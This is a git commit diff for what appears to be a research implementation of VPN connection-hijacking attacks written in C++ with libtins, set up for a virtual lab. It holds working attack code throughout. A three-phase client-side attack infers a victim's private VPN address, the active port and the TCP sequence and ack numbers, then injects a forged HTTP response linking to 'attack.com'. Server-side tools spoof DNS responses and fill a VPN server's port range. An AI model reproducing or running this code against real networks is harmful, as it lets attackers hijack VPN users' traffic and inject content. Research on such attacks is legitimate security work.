added client side attack env to virtual lab and server side tcp

client-side-attack/complete_attack/attack.sh

@@ -1,16 +1,17 @@
-REMOTE_ADDR=$1
-REMOTE_PORT=80
+REMOTE_ADDR=192.168.3.2 # ip of web-server to check for connection
+REMOTE_PORT=8080 # web server port
 
-VICTIM_WLAN_ADDR=192.168.12.58 # vpn client public ip
-WLAN_GATEWAY=192.168.12.1  # address of local network gateway
-VICTIM_PRIV_NET=10.7.2.0 # nord uses 10.7.2.x typically
+VICTIM_WLAN_ADDR=172.16.4.2 # vpn client wlan ip
+WLAN_GATEWAY=172.16.4.254  # address of local network gateway
+VICTIM_PRIV_NET=10.8.0.0
 PRIV_NETMASK=255.255.255.0
 
 REQUEST_SIZE=529
-DEST_MAC=a4:34:d9:53:92:c4
-INTERFACE=wlp1s0
+DEST_MAC=08:00:27:e8:bf:1f
+INTERFACE=enp0s9
+
+printf "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~~~~~~~~~ PHASE 1 ~~~~~~~~~~~\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"
 
-echo "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~~~~~~~~~ PHASE 1 ~~~~~~~~~~~\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
 
 echo `date`
 echo "attempting to infer client's private VPN address.."
@@ -18,20 +19,24 @@ echo "attempting to infer client's private VPN address.."
 cd ../first_phase
 
 
-PRIV_IP="$(./send_p1 $DEST_MAC $VICTIM_PRIV_NET $PRIV_NETMASK $WLAN_GATEWAY $INTERFACE)"
+PRIV_IP="$(sudo ./send_p1 $DEST_MAC $VICTIM_PRIV_NET $PRIV_NETMASK $WLAN_GATEWAY $INTERFACE)"
 echo "phase 1 client private IP: ${PRIV_IP}"
 
-echo "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~~~~~~~~~ PHASE 2 ~~~~~~~~~~~\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
+printf "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~~~~~~~~~ PHASE 2 ~~~~~~~~~~~\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"
+
 echo `date`
 echo "determining if client is talking to ${REMOTE_ADDR} on any port.."
 cd ../sec_phase
-VPORT="$(./send_p2 $REMOTE_ADDR $REMOTE_PORT $VICTIM_WLAN_ADDR $PRIV_IP $DEST_MAC)"
+
+VPORT="$(sudo ./send_p2 $REMOTE_ADDR $REMOTE_PORT $VICTIM_WLAN_ADDR $PRIV_IP $DEST_MAC $INTERFACE)"
 echo "phase 2 port result: ${VPORT}"
 
-echo "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~~~~~~~~~ PHASE 3 ~~~~~~~~~~~\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
+printf "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~~~~~~~~~ PHASE 3 ~~~~~~~~~~~\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"
 echo `date`
 echo "beginning phase 3 to infer sequence and ack numbers needed to inject.."
 cd ../third_phase
-./send_p3 $REMOTE_ADDR $REMOTE_PORT $VICTIM_WLAN_ADDR $PRIV_IP $DEST_MAC $VPORT $REQUEST_SIZE
+
+sudo ./send_p3 $REMOTE_ADDR $REMOTE_PORT $VICTIM_WLAN_ADDR $PRIV_IP $DEST_MAC $VPORT $REQUEST_SIZE $INTERFACE
+
 
 echo `date`

client-side-attack/first_phase/phase_one_attack.sh

@@ -1,10 +0,0 @@
-#/bin/bash
-
-./phase_one_attack 52:54:00:12:ae:4c\
-	52:54:00:12:ae:3f\
-	10.7.1.0\
- 	255.255.255.0\
-	192.168.64.1\
-	ens5\
-	35220\
-	443 

client-side-attack/first_phase/send.cpp

@@ -1,35 +1,3 @@
-/*
- * Modified from http://libtins.github.io/examples/syn-scanner/
- *
- * INCLUDED COPYRIGHT
- * Copyright (c) 2016, Matias Fontanini
- * All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions are
- * met:
- *
- * * Redistributions of source code must retain the above copyright
- *   notice, this list of conditions and the following disclaimer.
- * * Redistributions in binary form must reproduce the above
- *   copyright notice, this list of conditions and the following disclaimer
- *   in the documentation and/or other materials provided with the
- *   distribution.
- *
- * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
- * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
- * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
- * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
- * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
- * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
- * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
- * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
- * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
- * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
- *
- */
-
 #include <iostream>
 #include <iomanip>
 #include <vector>
@@ -116,9 +84,10 @@ void Scanner::launch_sniffer() {
     sniffer.sniff_loop(make_sniffer_handler(this, &Scanner::callback));
 }
 
-/* Our scan handler. This will receive SYN-ACKS and inform us
- * the scanned port's status.
- */
+
+// Handle sniffed packets until we find a response 
+// with a potential private tun IP address
+//
 bool Scanner::callback(PDU& pdu) {
 	// Find the layers we want.
 	const IP &ip = pdu.rfind_pdu<IP>(); // Grab IP layer of sniffed packet
@@ -141,7 +110,7 @@ void Scanner::run() {
     pthread_t thread;
     // Launch our sniff thread.
     pthread_create(&thread, 0, &Scanner::thread_proc, this);
-    // Start sending SYNs to port.
+    // Start sending SYNs to possible private IPs
     send_synacks();
 
     // Wait for our sniffer.

client-side-attack/sec_phase/send.cpp

@@ -17,12 +17,12 @@ bool sniffed_chack = false;
 bool is_running = true;
 bool verbose = false;
 bool count_chacks = false;
-bool quick_mode = true; // if true we don't recheck the port
+bool quick_mode = false; // if true we don't recheck the port
 
 int num_sent = 0;
 string victim_wlan_addr;
 string remote_addr;
-
+string interface;
 
 
 void print_divider(int count) {
@@ -36,30 +36,30 @@ void print_divider(int count) {
 bool handle_packet(PDU &some_pdu) {
 
   const IP &ip = some_pdu.rfind_pdu<IP>(); // Grab IP layer of sniffed packet
+
   // keep track of the last port we spoofed
   if (ip.src_addr() == remote_addr) current_spoof_port = some_pdu.rfind_pdu<TCP>().dport();
 
+
   if (ip.src_addr() == victim_wlan_addr) { // the packet is a response from the client
 
     const uint32_t& payload = some_pdu.rfind_pdu<RawPDU>().payload_size();
-    //cout << "sniffed something: " <<payload << "\n";
-    const int remainder = payload % 67; // 67 is the size of encrypted resets on ubuntu
+    const int remainder = payload % 99; // 99 is the size of encrypted resets on ubuntu 16
 
     if (remainder != 0) {
 
-      //cout << "\nsniffed something important - port : " << (current_spoof_port) << ", remainder : " << remainder << "\n";
+      //cout << "\nsniffed possible chack - port : " << (current_spoof_port) << ", remainder : " << remainder << "\n";
 
       // If it's not working as expected, uncomment the line above to
       // check what the typical remainder is looking like as it scans the
-      // port range. In this case, ubuntu 19, if you uncomment the line above
-      // it would repeatedly sniff 41 packets until the correct port, then it
-      // would sniff a 48 packet
+      // port range. In this case, on ubuntu 16, the encrypted RSTs have size 99
+      // compared to the encrypted ACKs that will be size 115 so we look for remainders
+      // of size 16
 
-      if (remainder != 41 && (remainder == 40 || remainder == 48)) { // the size of the remainder could change per OS 
+      if (remainder == 53 || remainder == 78 || remainder == 16) { // the size of the remainder could change per victim OS 
         if (verbose) cout << "sniffed chack - port : " << (current_spoof_port) << ", remainder : " << remainder <<", full size: " << payload << "\n";
 
         if (count_chacks) chack_count ++;
-        if (verbose) cout << "some other val: " << ((payload - 79) % 67) << "\n";
         if (!sniffed_chack) {
           sniffed_chack = true;
           best_port = current_spoof_port;
@@ -73,17 +73,20 @@ bool handle_packet(PDU &some_pdu) {
 void sniff_stuff() {
   SnifferConfiguration config;
   config.set_promisc_mode(true);
-  Sniffer sniffer("wlp1s0", config);
+  Sniffer sniffer(interface, config);
   sniffer.sniff_loop(handle_packet);
 }
 
 
-
+// Rechecks a potential matching port for the connection
+// and expects to see the same number of chall-acks 
+// triggered as num_checks
+//
 bool rechack(int num_checks, int possible_port, string dest_mac, string src_mac, string source_ip, int sport, string victim_ip) {
 
 
   PacketSender sender;
-  NetworkInterface iface("wlp1s0");
+  NetworkInterface iface(interface);
   count_chacks = true;
   chack_count = 0;
 
@@ -124,10 +127,10 @@ bool rechack(int num_checks, int possible_port, string dest_mac, string src_mac,
 int phase_two_spread(string dest_mac, string src_mac, string source_ip, int sport, string victim_ip) {
 
   PacketSender sender;
-  NetworkInterface iface("wlp1s0");
+  NetworkInterface iface(interface);
 
-  int start_port = 39000;//32768; // typical Linux ephemeral port range - (32768, 61000)
-  int end_port = 42000;//61000;
+  int start_port = 32768; // typical Linux ephemeral port range - (32768, 61000)
+  int end_port = 61000;
   int i;
 
   EthernetII pkt = EthernetII(dest_mac, src_mac) / IP(victim_ip, source_ip) / TCP(40404, sport);
@@ -152,8 +155,7 @@ int phase_two_spread(string dest_mac, string src_mac, string source_ip, int spor
 
   // In round 1 we spoofed fast (10 sleep) to get a good estimate of the
   // port in use. Round 2, we spoof slower from about 50 packets back to account
-  // for the delay in response and hopefully get the exact port number in use
-
+  // for the delay in response and hopefully get the exact port number in use.
   print_divider(1);
   usleep(1000000 / 2);
   sniffed_chack = false;
@@ -178,7 +180,9 @@ int phase_two_spread(string dest_mac, string src_mac, string source_ip, int spor
 }
 
 
-
+// Continually looks for a port in use by the victim VPN client
+// being used to communicate witht the target web server
+//
 int find_port(string dest_mac, string src_mac, string source_ip, int sport, string victim_ip) {
 
   bool is_found = false;
@@ -191,7 +195,7 @@ int find_port(string dest_mac, string src_mac, string source_ip, int sport, stri
 
     if (verbose) cout << "finished phase 2 w possible port: " << current_port << "\n";
 
-    cout << current_port << "\n";
+    //cout << current_port << "\n";
 
     if (quick_mode) {
       is_found = true;
@@ -210,8 +214,8 @@ int find_port(string dest_mac, string src_mac, string source_ip, int sport, stri
 
 int main(int argc, char** argv) {
 
-  if (argc != 5 && argc != 6) {
-    cout << "sike wrong number of args ---> (remote_addr, sport, victim_pub_ip, victim_priv_ip, victim_mac_addr)\n";
+  if (argc != 7) {
+    cout << "sike wrong number of args ---> (remote_addr, sport, victim_pub_ip, victim_priv_ip, victim_mac_addr, iface)\n";
     return 0;
   }
 
@@ -222,6 +226,8 @@ int main(int argc, char** argv) {
   //verbose = true;
 
   string dest_mac = argv[5];
+  interface = argv[6];
+
   string src_mac = "";
 
   print_divider(2);
@@ -231,7 +237,6 @@ int main(int argc, char** argv) {
   int p = find_port(dest_mac, src_mac, remote_addr, sport, dest_ip);
   is_running = false;
   sniff_thread.detach();
-  //sniff_thread.join();
 
   print_divider(1);
   if (verbose) cout << "Completed phase 2 with port: " << p << "\n\n";

client-side-attack/third_phase/send.cpp

@@ -31,7 +31,7 @@ bool show = false;
 bool testing = true; // if using netcat set to true, else false
 int sniff_request = 0; // 0 = off, 1 = sniffing for request, 2 = sniffed that request
 
-std::string victim_wlan_addr, dest_ip, remote_addr;
+std::string victim_wlan_addr, dest_ip, remote_addr, interface;
 int sport, dport, request_size, chack_count;
 
 
@@ -47,10 +47,13 @@ void print_divider(int count) {
   }
 }
 
+// Injects a malicious payload with the exact seq
+// and in-window ack inferred before
+//
 int inject_junk(long exact_seq, long in_win_ack) {
 
   PacketSender sender;
-  NetworkInterface iface("wlp1s0");
+  NetworkInterface iface(interface);
 
   std::string message = "HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\nContent-Length: 84\r\nConnection: keep-alive\r\n\r\n<h1><a href=\"https://attack.com\">Just some junk here..</a></h1>";
 
@@ -81,7 +84,7 @@ int inject_junk(long exact_seq, long in_win_ack) {
 bool rechack(long seq, long ack, int num_checks) {
 
   PacketSender sender;
-  NetworkInterface iface("wlp1s0");
+  NetworkInterface iface(interface);
   count_chacks = true;
 
   EthernetII pkt = EthernetII(dest_mac, src_mac) / IP(dest_ip, remote_addr) / TCP(dport, sport) / RawPDU("");;
@@ -104,7 +107,7 @@ bool rechack(long seq, long ack, int num_checks) {
   while (count < num_checks) {
     sender.send(pkt, iface);
     num_sent ++;
-    usleep(1000000 / 2 * 1.2); // must sleep half second due to chack rate limit
+    usleep(1000000 / 2 * 1.2); // must sleep half second due to chall-ack rate limit
     count ++;
   }
 
@@ -131,7 +134,7 @@ bool rechack(long seq, long ack, int num_checks) {
 long find_exact_seq(long in_win_seq, long in_win_ack, int send_delay) {
 
   PacketSender sender;
-  NetworkInterface iface("wlp1s0");
+  NetworkInterface iface(interface);
 
   EthernetII pkt = EthernetII(dest_mac, src_mac) / IP(dest_ip, remote_addr) / TCP(dport, sport) / RawPDU("");;
   TCP& tcp = pkt.rfind_pdu<TCP>();
@@ -190,10 +193,10 @@ long find_exact_seq(long in_win_seq, long in_win_ack, int send_delay) {
 long find_ack_block(long max_ack, long min_ack, long in_win_seq, long block_size, int send_delay, bool verbose, int chack_trigs) {
 
   PacketSender sender;
-  NetworkInterface iface("wlp1s0");
+  NetworkInterface iface(interface);
 
   // Loop over ack space sending empty push-acks
-  // that user the in window sequence number found before
+  // that use the in window sequence number found before
   //
 
   EthernetII pkt = EthernetII(dest_mac, src_mac) / IP(dest_ip, remote_addr) / TCP(dport, sport) / RawPDU("");;
@@ -213,7 +216,7 @@ long find_ack_block(long max_ack, long min_ack, long in_win_seq, long block_size
   best_ack = 0;
 
 
-  while (j > min_ack && chack_count < chack_trigs) { // was && !sniffed_chack
+  while (j > min_ack && chack_count < chack_trigs) { 
     usleep(send_delay);
 
     tcp.ack_seq(j);
@@ -309,7 +312,7 @@ long quack_spread(long in_win_seq) {
 long find_seq_block(long prev_block_size, long new_block_size, long delay_mult, long send_delay, long top_seq) {
 
   PacketSender sender;
-  NetworkInterface iface("wlp1s0");
+  NetworkInterface iface(interface);
 
   long max_seq = top_seq;
   long adder = prev_block_size * delay_mult;
@@ -352,7 +355,7 @@ bool handle_packet(PDU &some_pdu) {
       const uint32_t& payload = some_pdu.rfind_pdu<RawPDU>().payload_size();
       //cout << payload << "\n";
 
-      if (payload == 79) { // each triggered chall-ack is 79 length SSL vs ovpn and ubuntu 19
+      if (payload == 115) { // each triggered chall-ack is 115 length SSL 
         if (show) cout << "sniffed chack w ack: " << (current_spoof_ack) << "\n";
         if (count_chacks) chack_count += 1;
         if (track_nums) possible_acks.push_back(current_spoof_ack);
@@ -380,9 +383,8 @@ bool handle_packet(PDU &some_pdu) {
 
       const uint32_t& payload = some_pdu.rfind_pdu<RawPDU>().payload_size();
       //cout << payload << "\n";
-      const int remainder = payload % 67;
 
-      if (payload == 79) { 
+      if (payload == 115) { // each triggered chall-ack is 115 length SSL
 
         if (show) cout << "sniffed chack w seq: " << (current_spoof_seq) << "\n";
 
@@ -417,10 +419,12 @@ bool handle_packet(PDU &some_pdu) {
   return true;
 }
 
+
+
 void sniff_stuff() {
   SnifferConfiguration config;
   config.set_promisc_mode(true);
-  Sniffer sniffer("wlp1s0", config);
+  Sniffer sniffer(interface, config);
   sniffer.sniff_loop(handle_packet); // call the handle function for each sniffed pack
 }
 
@@ -463,7 +467,7 @@ long try_seq_block(long current_seq) {
   current_seq = best_seq;
   wait_count = 0;
 
-  long s2 = find_seq_block(1055, 20, 50, 600, current_seq); // for browser went from 300 to 600
+  long s2 = find_seq_block(1055, 20, 50, 600, current_seq); 
 
   while (best_seq == current_seq) {
     usleep(500000);
@@ -472,18 +476,18 @@ long try_seq_block(long current_seq) {
     if (wait_count > 5) return -1;
   }
 
-  return best_seq - 10000; // subtract 10k for wifi delay
+  return best_seq; 
 
 }
 
 // Gets rough estimate of sequence number in use
-// by spreading entire sequence range quicly then
+// by spreading entire sequence range quickly then
 // tries to find in win sequence using each
 //
 long find_in_win_seq() {
 
   PacketSender sender;
-  NetworkInterface iface("wlp1s0");
+  NetworkInterface iface(interface);
 
   long start_seq_guess = 1;
   long max_seq_num = 4294967295;
@@ -591,11 +595,11 @@ long find_in_win_ack(long in_win_seq) {
   track_nums = false;
 
   // clack has been consistently within 40k of next ack while testing but
-  // in practical use it needs to be less than the expected ack by at most
-  // 20k to be accepted as a valid ack, so here we add 20k to counter our delay
-  // but we could add a third ack scan to make it more accurate
+  // it needs to be less than the expected ack by at most 20k to be
+  // accepted as a valid ack, so here we add 30k to counter our delay
+  // but a third ack scan could be added to make it more accurate
   //
-  long in_win_ack = clack + 30000; // adding extra 30k for wifi delay 
+  long in_win_ack = clack + 30000; 
   return in_win_ack;
 }
 
@@ -643,12 +647,10 @@ int phase_three_spread() {
   usleep(1000000 / 2);
 
   long in_win_ack = find_in_win_ack(in_win_seq);
-  in_win_ack += 40000; // add 40k for wifi delay
 
   cout << "scanning for exact sequence num w in-win ack: " << in_win_ack << "\n";
 
-  // jump back 40 for wifi delay
-  long exact_seq = find_exact_seq(in_win_seq - 40, in_win_ack, 100000) + 1; // should be one less than left edge
+  long exact_seq = find_exact_seq(in_win_seq, in_win_ack, 100000) + 1; // should be one less than left edge
   cout << "final exact seq guess: " << exact_seq << "\n";
   cout << "total number of packets sent: " << num_sent << "\n";
   print_divider(2);
@@ -669,8 +671,8 @@ int phase_three_spread() {
 
 int main(int argc, char** argv) {
 
-  if (argc != 8) {
-    cout << "sike wrong number of args ---> (remote_ip, sport, victim_pub_ip, victim_priv_ip, victim_mac_addr, dport, request_size)\n";
+  if (argc != 9) {
+    cout << "sike wrong number of args ---> (remote_ip, sport, victim_pub_ip, victim_priv_ip, victim_mac_addr, dport, request_size, iface)\n";
     return 0;
   }
 
@@ -681,14 +683,13 @@ int main(int argc, char** argv) {
   dest_mac = argv[5];
   dport = atoi(argv[6]);
   request_size = atoi(argv[7]);
-
+  interface = argv[8];
   thread sniff_thread(sniff_stuff);
   print_divider(2);
 
   int r = phase_three_spread();
 
   sniff_thread.detach();
-  //sniff_thread.join();
 
   return 0;
 }

server-side-attack/dns-sside/full_scan/send.cpp

@@ -227,7 +227,6 @@ int port_spread(string source_ip, int sport, string dest_ip, int start_port, int
 
     IP pkt = IP(dest_ip, source_ip) / UDP(spoof_port, sport) / RawPDU(send_payload);
     current_spoof_port = spoof_port;
-    //udp.dport(spoof_port); // set the packets dest port to current guess
 
     int round_sends = 0;
     while (round_sends < 4) { // send 4 at a time then sleep again
@@ -490,7 +489,7 @@ int send_dns(string src_ip, int sport, string dest_ip, int dport) {
 
   cout << "Attempting to inject dns response on port " << dport << "\n\n";
 
-  string spoof_domain = "yo.com";
+  string spoof_domain = "test.com";
   string redirect_ip = "22.22.22.22";
   injecting = true;
 
@@ -560,7 +559,7 @@ int find_ports(string source_ip, int sport, string dest_ip, int start_port, int
 
     if (exact_port == 0) is_found = true;
     else {
-      cout << "found some exact port: " << exact_port << "\n\n";
+      cout << "found exact port: " << exact_port << "\n\n";
       print_time();
 
       send_dns(source_ip, sport, dest_ip, exact_port);
@@ -597,7 +596,7 @@ int main(int argc, char** argv) {
   source_ip = argv[1]; // dns server IP
   int sport = atoi(argv[2]); // most likely 53
   dest_ip = argv[3]; // vpn server IP
-  verbose = true;
+  //verbose = true;
 
   int start_port = atoi(argv[4]); // Linux ephemeral range is (32768, 60999)
   int end_port = atoi(argv[5]);
@@ -609,9 +608,6 @@ int main(int argc, char** argv) {
 
   int res = find_ports(source_ip, sport, dest_ip, start_port, end_port);
 
-  //sniff_thread.join();
-  //send_sniff_thread.join();
-
   sniff_thread.detach();
   send_sniff_thread.detach();
 

server-side-attack/dns-sside/phases/udder_fillup/Makefile

@@ -1,2 +0,0 @@
-all:
-	g++ -O3 -o uud_send send.cpp -lpthread -ltins -std=c++11

server-side-attack/dns-sside/phases/udder_fillup/fillup.blah

@@ -1,26 +0,0 @@
-#/bin/bash
-#
-
-
-START_PORT=42000
-END_PORT=62000
-
-
-SRC_IP=10.8.0.10
-#SRC_IP=$(ifconfig | grep inet | grep -w 10.8 | awk -F' ' '{print $2}' | awk -F':' '{print $2}')
-NOW=$(date '+%F %T')
-echo "Starting port fill at $NOW"
-
-echo "Using tun src ip: $SRC_IP"
-echo "Filling up vpn port range from $START_PORT to $END_PORT.."
-
-sudo ./uud_send 192.168.3.2 53 $SRC_IP $START_PORT $END_PORT
-
-#sleep 1
-
-#echo "Responding to all my own client probes to make sure they're kept in the table"
-
-#sudo ./uud_send 192.168.3.2 54 192.168.2.2 $START_PORT $END_PORT 1
-
-NOW1=$(date '+%F %T')
-echo "Finished port fill at $NOW1"

server-side-attack/dns-sside/phases/udder_fillup/send.cpp

@@ -1,165 +0,0 @@
-#include <tins/tins.h>
-#include <cassert>
-#include <iostream>
-#include <string>
-#include <unistd.h>
-#include <thread>
-#include <random>
-
-
-using std::thread;
-using std::cout;
-using std::string;
-using std::vector;
-using namespace Tins;
-
-
-bool is_running = true;
-bool verbose = false;
-bool count_resp = false;
-
-string dest_ip;
-string server_ip;
-
-
-void print_divider(int count) {
-  int i = 0;
-  while (i < count) {
-    if (verbose) cout << "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
-    i++;
-  }
-}
-
-
-std::string random_string(std::size_t length) {
-
-  const std::string CHARACTERS = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
-
-  std::random_device random_device;
-  std::mt19937 generator(random_device());
-  std::uniform_int_distribution<> distribution(0, CHARACTERS.size() - 1);
-
-  string random_string;
-
-  for (std::size_t i = 0; i < length; ++i) {
-    random_string += CHARACTERS[distribution(generator)];
-  }
-
-  return random_string;
-}
-
-
-
-// Spreads UDPs across the victim's entire port range
-// to find a port that is being used and the spoofed packets
-// get NAT'ed back to the client
-//
-int spread_uds(bool server_spread, string server_ip, int server_port, string dest_ip, int start_port, int end_port) {
-
-  PacketSender sender;
-  NetworkInterface iface("enp0s9");
-  int i;
-  IP pkt;
-
-  if (server_spread) pkt = IP(dest_ip, server_ip) / UDP(start_port, server_port);
-  else pkt = IP(server_ip, dest_ip) / UDP(server_port, start_port);
-
-  UDP& udp = pkt.rfind_pdu<UDP>();
-  int spoof_port = start_port;
-
-  int send_size = 0;
-  int send_count = 0;
-  string send_payload = random_string(send_size);
-
-
-
-  cout << "spreading the port range from " << spoof_port << " to " << end_port << " with udps..\n";
-
-
-  while (spoof_port < end_port) {
-
-    if (server_spread) udp.dport(spoof_port); // set the packets src port to current guess
-    else udp.sport(spoof_port);
-    sender.send(pkt, iface);
-    spoof_port++;
-    send_size ++;
-    send_payload = random_string(send_size);
-    //cout << "next rando string: " << send_payload << "\n";
-
-    // if the payload size reaches 1000 (max), reset back to 0
-    if (send_size >= 1000) {
-      send_size = 0;
-      cout << "Sent w size 1000 to " << spoof_port << "\n";
-    }
-
-    usleep(1);
-  }
-
-  if (verbose) print_divider(2);
-
-  return 1;
-
-}
-
-
-int fill_ports(bool server_spread, string source_ip, int sport, string dest_ip, int start_port, int end_port) {
-
-  bool filling = true;
-  int current_port = 0;
-
-  while (filling) {
-
-    current_port = spread_uds(server_spread, source_ip, sport, dest_ip, start_port, end_port);
-    print_divider(1);
-
-    if (verbose) cout << "finished phase 2 w possible port: " << current_port << "\n";
-
-    count_resp = true;
-    filling = false;
-    print_divider(2);
-
-  }
-
-  return current_port;
-
-}
-
-
-
-
-int main(int argc, char** argv) {
-
-  cout << "arc twas: " << argc;
-
-  if (argc != 6 && argc != 7) {
-    cout << "sike wrong number of args ---> (server_ip, server_port, dest_ip, start_port, end_port <enable_server_spread>)\n";
-    return 0;
-  }
-
-  server_ip = argv[1]; // dns server IP
-  int server_port = atoi(argv[2]);
-  dest_ip = argv[3]; // vpn server IP
-  int start_port = atoi(argv[4]);
-  int end_port = atoi(argv[5]);
-  bool server_spread = false;
-
-  if (argc == 7) server_spread = true;
-
-  verbose = true;
-
-  string dest_mac = "";
-  string src_mac = "";
-
-  print_divider(2);
-
-
-  int p = fill_ports(server_spread, server_ip, server_port, dest_ip, start_port, end_port);
-
-  cout << p << "\n";
-  print_divider(1);
-  is_running = false;
-
-  if (verbose) cout << "Filled up all those ports and finished at: " << p << "\n";
-
-  return p;
-}

server-side-attack/tcp-sside/send.cpp → server-side-attack/tcp-sside/conn_inf/send.cpp

@@ -16,7 +16,7 @@ using namespace Tins;
 int current_spoof_port, best_port, chack_count;
 bool is_running = true;
 bool verbose = false;
-
+bool rechecking = true; // rechecks inferred port if true
 
 bool sniffed_resp = false;
 string dest_ip;
@@ -32,29 +32,15 @@ void print_divider(int count) {
   }
 }
 
-bool handle_send_packet(PDU &some_pdu) {
-
-  const IP &ip = some_pdu.rfind_pdu<IP>(); // Grab IP layer of sniffed packet
-
-  if (ip.src_addr() == source_ip) {
-    current_spoof_port = some_pdu.rfind_pdu<TCP>().dport();
-    //cout << "Current Spoof Port (sniff) = " << current_spoof_port << "\n"; 
- }
-  if (ip.src_addr() == dest_ip) {
-
-    const uint32_t& payload = some_pdu.rfind_pdu<RawPDU>().payload_size();
-    //cout << "Payload Size = " << payload << "\n";
-    const int remainder = payload % 115;
-  }
-
-  return is_running;
-
-}
 
 bool handle_packet(PDU &some_pdu) {
 
   const IP &ip = some_pdu.rfind_pdu<IP>(); // Grab IP layer of sniffed packet
 
+  // keep track of the last port we spoofed
+  if (ip.src_addr() == source_ip) current_spoof_port = some_pdu.rfind_pdu<TCP>().dport();
+
+
   // in this case we're looking for a packet from the vpn server to the vpn client
   //
   // the src ip should be the VPN server and dest ip should be
@@ -76,26 +62,40 @@ bool handle_packet(PDU &some_pdu) {
   return is_running;
 }
 
+
+
 void sniff_stuff() {
   SnifferConfiguration config;
   config.set_promisc_mode(true);
-  //config.set_filter("ip dst 10.0.0.215");
-  // would want to filter out ssh stuff at some point
   Sniffer sniffer("any", config);
   sniffer.sniff_loop(handle_packet);
 
 }
 
 
-void sniff_send_stuff() {
+int recheck_port(string source_ip, int sport, string dest_ip, int found_port, int num_checks) {
 
-  SnifferConfiguration config;
-  config.set_promisc_mode(true);
-  Sniffer sniffer("any", config);
-  sniffer.sniff_loop(handle_send_packet);
+  PacketSender sender;
+  NetworkInterface iface("enp0s9");
 
-}
+  IP pkt = IP(dest_ip, source_ip) / TCP(found_port, sport);
+  TCP& tcp = pkt.rfind_pdu<TCP>();
+  tcp.flags(TCP::SYN | TCP::ACK);
 
+  int i = 0;
+
+  while (i < num_checks) {
+
+    cout << "Sending recheck probe number " << i << "\n\n";
+    sender.send(pkt, iface);
+    usleep(500);
+    i ++;
+  }
+
+  usleep(3000000);
+
+  return 1;
+}
 
 
 
@@ -125,15 +125,14 @@ int phase_two_spread(string source_ip, int sport, string dest_ip, int start_port
     count++;
     i ++;
     if (count % 50 == 0) {
-       usleep(1000);
-       cout << " Current port = " << i << ". Best port = " << best_port << ".\n";
+       //usleep(500);
+       if (verbose) cout << " Current port = " << i << ". Best port = " << best_port << ".\n";
     }
 
     if (best_port != 0) found = true;
 
   }
 
-  usleep(1000000); // sleep to give victim time to respond w chack
 
   current_port = best_port;
  
@@ -152,13 +151,12 @@ int phase_two_spread(string source_ip, int sport, string dest_ip, int start_port
   while (j < (current_port + 300) && !found) {
     tcp.dport(j); // set the packets dest port to current guess
     sender.send(pkt, iface);
-    cout << "Current guess port = " << j << " and best port = " << best_port << " \n";
+    if (verbose) cout << "Current guess port = " << j << " and best port = " << best_port << " \n";
     usleep(10000);
     j ++;
     if (best_port != 0) found = true;
   }
 
-  usleep(1000000);
 
   if (verbose) cout << "finished round 2 w guessed port: " << best_port << "\n";
 
@@ -210,20 +208,16 @@ int main(int argc, char** argv) {
   print_divider(2);
 
   thread sniff_thread(sniff_stuff);
-  thread send_sniff_thread(sniff_send_stuff);
 
   int p = find_port(source_ip, sport, dest_ip, start_port, end_port);
 
   //cout << p << "\n";
   print_divider(1);
-  //if (verbose) cout << "Completed phase 2 with port: " << p << "\n\n";
-
-  //if (verbose) cout << "Attempting to spoof DNS back on port ..\n";
-  //int res = spoof_dns(source_ip, sport, dest_ip, p);
 
+  if (rechecking) int res = recheck_port(source_ip, sport, dest_ip, p, 3);
+  
   is_running = false;
   sniff_thread.join();
-  send_sniff_thread.join();
 
 
   return p;

server-side-attack/tcp-sside/inject/Makefile

@@ -0,0 +1,2 @@
+all:
+	g++ -O3 -o send_p3 send.cpp -lpthread -ltins -std=c++11

server-side-attack/tcp-sside/inject/send.cpp

@@ -0,0 +1,695 @@
+#include <tins/tins.h>
+#include <cassert>
+#include <iostream>
+#include <string>
+#include <unistd.h>
+#include <thread>
+
+
+using std::thread;
+using std::cout;
+using std::vector;
+using namespace Tins;
+
+long current_spoof_seq;
+long current_spoof_ack;
+long current_min_ack;
+long best_seq = 0;
+long best_ack;
+
+vector<long> possible_seqs;
+vector<long> possible_acks;
+
+int num_sent = 0;
+int current_round = 1;
+bool ack_search = false;
+bool track_nums = false;
+bool count_chacks = false;
+bool sniffed_chack = false;
+
+bool show = false;
+bool testing = true; // if using netcat set to true, else false
+int sniff_request = 0; // 0 = off, 1 = sniffing for request, 2 = sniffed that request
+
+std::string victim_wlan_addr, dest_ip, remote_addr, interface;
+int sport, dport, request_size, chack_count;
+
+
